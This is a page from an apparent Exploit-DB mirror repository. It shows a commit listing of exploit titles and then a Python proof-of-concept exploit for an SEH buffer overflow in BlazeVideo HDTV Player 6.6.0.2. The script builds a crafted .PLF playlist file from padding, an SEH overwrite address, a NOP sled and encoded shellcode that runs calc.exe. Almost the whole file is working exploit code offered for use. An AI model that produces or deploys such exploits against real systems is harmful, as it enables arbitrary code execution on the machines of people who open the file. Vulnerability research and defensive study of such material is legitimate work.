bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/38394.py
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

47 lines
No EOL
2.1 KiB
Python
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/58624/info
BlazeVideo HDTV Player Standard is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
BlazeVideo HDTV Player Standard 6.6.0.2 is vulnerable; other versions may also be affected.
# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow
# Date: 19-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.blazevideo.com/hdtv-player/
# Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std
# Version: BlazeVideo HDTV Player Standard 6.6.0.2
# Tested on: Windows 7 German
filename="poc.PLF"
junk = "http://"+ "\x41" * 601
nseh = "\xEB\x06\x90\x90"
seh = "\x5F\x17\x60\x61" #6160175F \EPG.dll
nops = "\x90" * 20
#windows/exec CMD=calc.exe bad \x00\x0a\x1a
shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60"
"\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04"
"\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf"
"\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e"
"\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5"
"\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b"
"\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95"
"\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a"
"\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6"
"\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7"
"\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5"
"\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36"
"\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2"
"\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b"
"\xc4\x35")
f = open(filename,"wb")
f.write(junk+nseh+seh+nops+shellcode)
f.close()
print("Finish")
Reference in a new issue View git blame Copy permalink